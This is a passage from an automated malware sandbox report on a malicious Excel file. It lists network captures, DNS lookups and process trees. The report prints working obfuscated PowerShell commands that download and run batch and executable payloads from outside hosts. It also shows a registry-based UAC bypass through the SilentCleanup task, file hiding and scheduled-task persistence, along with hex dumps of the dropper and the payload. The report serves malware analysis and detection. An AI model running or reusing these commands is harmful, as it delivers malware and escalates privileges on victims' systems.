                                                          Jan 5, 2021 10:06:48.152671099 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.152781010 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152797937 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.152844906 CET4917080192.168.2.2279.124.76.20
                                                          Jan 5, 2021 10:06:48.153013945 CET804917079.124.76.20192.168.2.22
                                                          Jan 5, 2021 10:06:48.153028965 CET804917079.124.76.20192.168.2.22

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 5, 2021 10:06:37.132224083 CET5219753192.168.2.228.8.8.8
                                                          Jan 5, 2021 10:06:37.188653946 CET53521978.8.8.8192.168.2.22
                                                          Jan 5, 2021 10:06:37.795423031 CET5309953192.168.2.228.8.8.8
                                                          Jan 5, 2021 10:06:37.843441010 CET53530998.8.8.8192.168.2.22
                                                          Jan 5, 2021 10:06:37.846391916 CET5283853192.168.2.228.8.8.8
                                                          Jan 5, 2021 10:06:37.894357920 CET53528388.8.8.8192.168.2.22
                                                          Jan 5, 2021 10:06:47.743778944 CET6120053192.168.2.228.8.8.8
                                                          Jan 5, 2021 10:06:47.827884912 CET53612008.8.8.8192.168.2.22

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Jan 5, 2021 10:06:37.132224083 CET192.168.2.228.8.8.80x7885Standard query (0)cutt.lyA (IP address)IN (0x0001)
                                                          Jan 5, 2021 10:06:47.743778944 CET192.168.2.228.8.8.80x9bfeStandard query (0)speed-bg.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                          Jan 5, 2021 10:06:37.188653946 CET8.8.8.8192.168.2.220x7885No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                          Jan 5, 2021 10:06:37.188653946 CET8.8.8.8192.168.2.220x7885No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                          Jan 5, 2021 10:06:37.188653946 CET8.8.8.8192.168.2.220x7885No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                          Jan 5, 2021 10:06:47.827884912 CET8.8.8.8192.168.2.220x9bfeNo error (0)speed-bg.com79.124.76.20A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • 37.46.150.139
                                                          • speed-bg.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.224916937.46.150.13980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 5, 2021 10:06:39.088344097 CET71OUTGET /bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat HTTP/1.1
                                                          Host: 37.46.150.139
                                                          Connection: Keep-Alive
                                                          Jan 5, 2021 10:06:39.137165070 CET72INHTTP/1.1 200 OK
                                                          Date: Tue, 05 Jan 2021 09:06:39 GMT
                                                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                                                          Last-Modified: Tue, 05 Jan 2021 00:31:01 GMT
                                                          ETag: "956-5b81c522fe197"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 2390
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-msdownload
                                                          Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61 74 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 6f 6b 2e 62 61 74 3b 20 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 73 70 65 65 64 2d 62 67 2e 63 6f 6d 2f 6b 61 70 61 33 2f 66 65 72 72 61 7a 69 6f 2f 74 79 70 6c 61 2f 6a 62 6d 2f 35 62 59 44 41 53 74 6f 65 4a 6e 4c 6d 72 6f 2e 65 78 65 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 73 62 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 73 62 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61
                                                          Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.ba


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.224917079.124.76.2080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 5, 2021 10:06:47.916533947 CET74OUTGET /kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe HTTP/1.1
                                                          Host: speed-bg.com
                                                          Connection: Keep-Alive
                                                          Jan 5, 2021 10:06:47.998641968 CET76INHTTP/1.1 200 OK
                                                          Date: Tue, 05 Jan 2021 09:06:47 GMT
                                                          Server: Apache mod_bwlimited/1.4
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, Keep-Alive
                                                          Last-Modified: Tue, 05 Jan 2021 00:27:38 GMT
                                                          ETag: "74e447a-353000-5b81c46187603"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 3485696
                                                          Keep-Alive: timeout=5
                                                          Content-Type: application/x-msdownload
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 b1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 1a 35 00 00 14 00 00 00 00 00 00 b2 38 35 00 00 20 00 00 00 40 35 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 35 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 38 35 00 4f 00 00 00 00 40 35 00 84 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 35 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 18 35 00 00 20 00 00 00 1a 35 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 11 00 00 00 40 35 00 00 12 00 00 00 1c 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 35 00 00 02 00 00 00 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 38 35 00 00 00 00 00 48 00 00 00 02 00 05 00 20 5d 00 00 c0 43 00 00 03 00 00 00 65 00 00 06 e0 a0 00 00 80 97 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 04 00 00 06 00 2a 0a 00 2a 00 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 16 00 00 0a 00 00 02 03 28 17 00 00 0a 00 2a 00 13 30 05 00 dd 07 00 00 02 00 00 11 00 d0 02 00 00 02 28 18 00 00 0a 73 19 00 00 0a 0a 02 73 1a 00 00 0a 7d 02 00 00 04 02 73 1b 00 00 0a 7d 04 00 00 04 02 73 1b 00 00 0a 7d 05 00 00 04 02 73 1b 00 00 0a 7d 06 00 00 04 02 73 1b 00 00 0a 7d 07 00 00 04 02 73 1c 00 00 0a 7d 08 00 00 04 02 73 1d 00 00 0a 7d 09 00 00 04 02 73 1e 00 00 0a 7d 03 00 00 04 02 7b 02 00 00 04 6f 1f 00 00 0a 00 02 7b 03 00 00 04 6f 20 00 00 0a 00 02 28 1f 00 00 0a 00 02 7b 02 00 00 04 18 6f 21 00 00 0a 00 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 04 42 73 23 00 00 0a 6f 24 00 00 0a 26 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 86 42 73 23 00 00 0a 6f 24 00 00 0a 26 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 03 00 00 04 16 16 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 04 00 00 04 17 16 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 05 00 00 04 17 17 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 06 00 00 04 17 18 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_0585 @5@ 5@`85O@5`5 H.text5 5 `.rsrc@55@@.reloc`5.5@B85H ]Ce4^}((**0+,{+,{o(*0(ss}s}s}s}s}s}s}s}{o{o ({o!{o""Bs#o$&{o""Bs#o$&{o%{o&{o%{o&{o%{o&{o%{o&{o%


                                                          HTTPS Packets

                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                          Jan 5, 2021 10:06:37.300777912 CET104.22.0.232443192.168.2.2249167CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                          CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:10:06:42
                                                          Start date:05/01/2021
                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                          Imagebase:0x13f840000
                                                          File size:27641504 bytes
                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:10:06:44
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:44
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:45
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:45
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                                                          Imagebase:0x13f420000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:10:06:45
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:45
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                                                          Imagebase:0x13f420000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:10:06:46
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:46
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                                                          Imagebase:0x13f420000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:10:06:46
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                                                          Imagebase:0x13f420000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:10:06:47
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
                                                          Imagebase:0x13f420000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmp, Author: Florian Roth
                                                          Reputation:high

                                                          General

                                                          Start time:10:06:49
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\attrib.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                                                          Imagebase:0xffe90000
                                                          File size:18432 bytes
                                                          MD5 hash:C65C20C89A255517F11DD18B056CADB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:56
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:56
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\mode.com
                                                          Wow64 process (32bit):false
                                                          Commandline:mode 18,1
                                                          Imagebase:0xff2d0000
                                                          File size:30208 bytes
                                                          MD5 hash:718E86CB060170430D4EF70EE39F93D4
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:57
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c ver
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:57
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
                                                          Imagebase:0x4aa40000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:10:06:58
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
                                                          Imagebase:0x13f420000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:10:07:03
                                                          Start date:05/01/2021
                                                          Path:C:\Users\user\AppData\Roaming\sb.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\AppData\Roaming\sb.exe'
                                                          Imagebase:0xcd0000
                                                          File size:3485696 bytes
                                                          MD5 hash:1C1BDD57483BBFBB497B4596BE12B053
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000002.2229844300.0000000002900000.00000004.00000001.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low

                                                          General

                                                          Start time:10:07:43
                                                          Start date:05/01/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'
                                                          Imagebase:0x270000
                                                          File size:179712 bytes
                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:10:07:45
                                                          Start date:05/01/2021
                                                          Path:C:\Users\user\AppData\Roaming\sb.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:{path}
                                                          Imagebase:0xcd0000
                                                          File size:3485696 bytes
                                                          MD5 hash:1C1BDD57483BBFBB497B4596BE12B053
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >